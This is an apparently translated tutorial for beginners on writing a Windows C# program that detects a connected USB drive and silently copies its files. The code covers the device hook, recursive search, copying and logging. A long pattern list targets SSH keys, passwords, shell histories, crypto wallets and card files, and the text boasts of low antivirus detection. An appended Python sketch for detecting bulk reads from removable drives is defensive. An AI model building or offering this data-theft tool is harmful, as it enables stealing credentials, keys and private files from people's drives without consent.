
Writing a program to steal data from a USB-drive in Windows

Task:
Write software that performs unauthorized copying of files from a legitimately connected USB device and that requires neither installation nor administrator rights.
That is, legitimate software that attackers can use to cause harm (according to the interpretation of one of the antivirus tools).
Algorithm of the program
Audience:
Beginners in programming and just interested.

An example of how an attacker might use the software:

We write the program:
1. Detect the connection of the USB device
Overriding the WndProc Method
protected override void WndProc(ref Message m)//  : base.WndProc(ref m); const int WM_DeviceChange = 0x219; //-   usb const int DBT_DEVICEARRIVAL = 0x8000; //  const int DBT_DEVICEREMOVECOMPLETE = 0x8004; //   if (m.Msg == WM_DeviceChange) Thread T = new Thread(_); if (m.WParam.ToInt32() == DBT_DEVICEARRIVAL) T.Start();// usb  if (m.WParam.ToInt32() == DBT_DEVICEREMOVECOMPLETE) T.Abort();// usb  


2. Choose the file patterns to search for (the order is individual, because everyone decides for themselves which types of files to copy first)
The patterns are stored, for example, in listBox2:
*.ppk
*.pref
*.remmina
*.sh
*.txt
*.ml*
*access*.txt
*account*
*accs*.txt
*admin*.txt
*amazon*.txt
*authorized_keys*
*balance*.txt
*bash_history*
*billing*.txt
*btc*.txt*brute*
*c6ep*.txt
*cepep*
*codes*
*connect*
*contacts*.txt
*database*
*dedic*.txt
*dedik*.txt
*domain*.txt
*ftp*.txt
*hack*.txt
*host*.txt
*icq*.txt
*id_*sa*
*id_dsa*
*id_rsa*
*known_hosts*
*ksh_history*
*login*
*mail*.txt
*merchant*.txt
*money*
*myadmin*.txt
*mysql_history*
*nano_history*
*parol*
*pass*
*pentest*
*pgsql_history*
*pma*.txt
*pref*
*qwerty*
*rdp*.txt
*remmina*
*root*
*serv*.txt
*sh_history*
*srv*.txt
*todo*.txt
*userid*
*users*
*vds*.txt
*vpn*.txt
*vps*.txt
*vuln*.txt
*wallet*
*webmon*
*zsh_history*
access.txt
adm.txt
all.txt
bill.txt
card.txt
cards.txt
cc.txt
centos.txt
data.txt
ded.txt
ftps.txt
full.txt
hdd.txt
host.txt
id.txt
info.txt
key.txt
linux.txt
mail.txt
mails.txt
pern*.txt
skype*.txt
sql*.txt
ssh*.txt
sys.txt
tconn.conf
toor.txt
ubuntu.txt
usb.txt
user.txt
virtual.txt
*pass*
*pwd*
*login*
*vk.com*

*.xls*
*.doc*
*.rtf
*.JPG
*.jpeg
*.pgf
*.bmp
*.cr2
*config*


3. Search for files on the USB drive.
Search function:
 private ArrayList F;//    private void _() Thread.Sleep(4000);//         foreach (var dInfo in DriveInfo.GetDrives()) if (dInfo.IsReady && dInfo.DriveType == DriveType.Removable) for (int i = 0; i < listBox2.Items.Count; i++) { foreach (string file in Directory.GetFiles(@dInfo.Name, listBox2.Items[i].ToString(), SearchOption.AllDirectories)) F.Add(new FILEclass(file, Path.GetFileName(file))); } 


5. Copy files from the connected USB drive to your computer
Copy function
 private void cheat() ... ... //    Directory.CreateDirectory("Liked " + DateTime.Now.Year + "." + DateTime.Now.Month + "." + DateTime.Now.Day); int copied = 0; int copy_err = 0; int exist = 0; for (int i = 0; i < F.Count; i++) { string sourceName = Path.GetFileName((((FILEclass)(F[i])).Fullname)); string source = ((FILEclass)(F[i])).Fullname; string dest = Dir + @"\" + ((FILEclass)(F[i])).name; string destName = Path.GetFileName(Dir + @"\" + ((FILEclass)(F[i])).name); if (sourceName.Equals(destName)) if (File.Exists(source)) if (File.Exists(dest)) try { if (FileCompare(source, dest)) exist++; //    else//  -   File.Copy(source, Dir + @"\" + Timenow() + "s. " + ((FILEclass)(F[i])).name); copied++; } catch{copy_err++; }//   USB-  else { try File.Copy(source, dest); catch { copy_err++; } copied++; } else copy_err++; } 

The function of comparing two files
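// https://support.microsoft.com/ru-ru/kb/320348
// Requires: using System.IO;
private bool FileCompare(string file1, string file2)
{
    int file1byte;
    int file2byte;
    FileStream fs1;
    FileStream fs2;

    // The same path was passed twice, so the contents are identical.
    if (file1 == file2)
        return true;

    fs1 = new FileStream(file1, FileMode.Open);
    fs2 = new FileStream(file2, FileMode.Open);

    // Files of different length cannot be equal.
    if (fs1.Length != fs2.Length)
    {
        fs1.Close();
        fs2.Close();
        return false;
    }

    // Read one byte from each file until a mismatch or the end of the file.
    do
    {
        file1byte = fs1.ReadByte();
        file2byte = fs2.ReadByte();
    }
    while ((file1byte == file2byte) && (file1byte != -1));

    fs1.Close();
    fs2.Close();

    // Equal only if the last bytes read match (both -1 at end of file).
    return ((file1byte - file2byte) == 0);
}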

6. Logging
By adding a log, you can easily see the approximate folder structure on a USB device and what is copied:

14.08.2015 21:25:13 =============================================
14.08.2015 21:25:17
14.08.2015 21:25:18   F:\123hack.txt
14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\App1.csproj.FileListAbsolute.txt
14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\LanguageQualifiers.txt
14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\ProjectArchitectures.txt
14.08.2015 21:25:18   F:\ \\Cisco Mars incident parser\Cisco Mars incident parser\obj\Debug\Cisco Mars incident parser.csproj.FileListAbsolute.txt
14.08.2015 21:25:18   F:\ \\dots\dots\obj\Debug\dots.csproj.FileListAbsolute.txt
14.08.2015 21:25:18   F:\ \\genovirus\genovirus\Assets\AboutAssets.txt
14.08.2015 21:25:18   F:\ \\genovirus\genovirus\Resources\AboutResources.txt
14.08.2015 21:25:18   F:\ \\TheGenoVirus\TheGenoVirus\obj\Debug\ResourceTypeUsage.txt
14.08.2015 21:25:18   F:\ \\TheGenoVirus\TheGenoVirus\obj\Debug

7. Copying data from external HDDs is left as “homework”

Conclusions:
Do not store sensitive information on removable USB devices, and do not connect them to untrusted devices.
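
On the machine-owner side, the behaviour described in steps 1 to 5 (one process reading many files across a removable volume within seconds of its arrival) is something file-read telemetry can flag. The sketch below is an added example, not code from the original article; the event tuple layout, the process names, the allowlist and the thresholds are all assumptions, and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"
DAY = "2015-08-14 "

# Constructed file-read telemetry as (timestamp, process, path). The tuple layout
# and every process name are assumptions; map your EDR or audit fields onto it.
EVENTS = (
    # Allowlisted shell browsing the drive right after it is plugged in.
    [(DAY + "21:25:14", "explorer.exe", rf"F:\pics\img{i}.jpg") for i in range(8)]
    # Hypothetical collector: six files across folders within two seconds.
    + [(DAY + f"21:25:1{8 + i // 4}", "copytool.exe", rf"F:\src\dir{i}\notes{i}.txt")
       for i in range(6)]
    # A user opening one document.
    + [(DAY + "21:30:00", "winword.exe", r"F:\docs\report.doc")]
    # Slow reader: five files, one per minute, never dense enough to alert.
    + [(DAY + f"21:4{i}:00", "backup.exe", rf"F:\src\file{i}.txt") for i in range(5)]
)

ALLOWLIST = {"explorer.exe"}       # assumption: processes expected to read the drive
WINDOW = timedelta(seconds=10)     # assumption: tune to your environment
THRESHOLD = 5                      # distinct files per process per volume in WINDOW


def find_bursts(events, removable=("F:",), window=WINDOW, threshold=THRESHOLD):
    """Return [(process, volume, distinct_files, window_start)] for read bursts."""
    reads = defaultdict(list)
    for ts, proc, path in events:
        volume = path[:2].upper()
        if volume in removable and proc.lower() not in ALLOWLIST:
            reads[(proc.lower(), volume)].append((datetime.strptime(ts, FMT), path))
    alerts = []
    for (proc, volume), items in sorted(reads.items()):
        items.sort()
        best_count, best_start = 0, None
        for i, (t0, _) in enumerate(items):
            # Distinct files read in the window that opens at this event.
            files = {p.lower() for t, p in items[i:] if t - t0 <= window}
            if len(files) > best_count:
                best_count, best_start = len(files), t0
        if best_count >= threshold:
            alerts.append((proc, volume, best_count, best_start.strftime(FMT)))
    return alerts


if __name__ == "__main__":
    for alert in find_bursts(EVENTS):
        print("bulk read from removable volume:", alert)
```

The list of removable volumes is passed in because the telemetry source, not this script, has to say which drive letters were removable at the time of the read.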
Ready example in "Cloud@mail.ru"

www.virustotal.com: 1/56 (the antivirus "VBA32" detects it as "Trojan.MSIL.gen.11").

Source: https://habr.com/ru/post/264513/

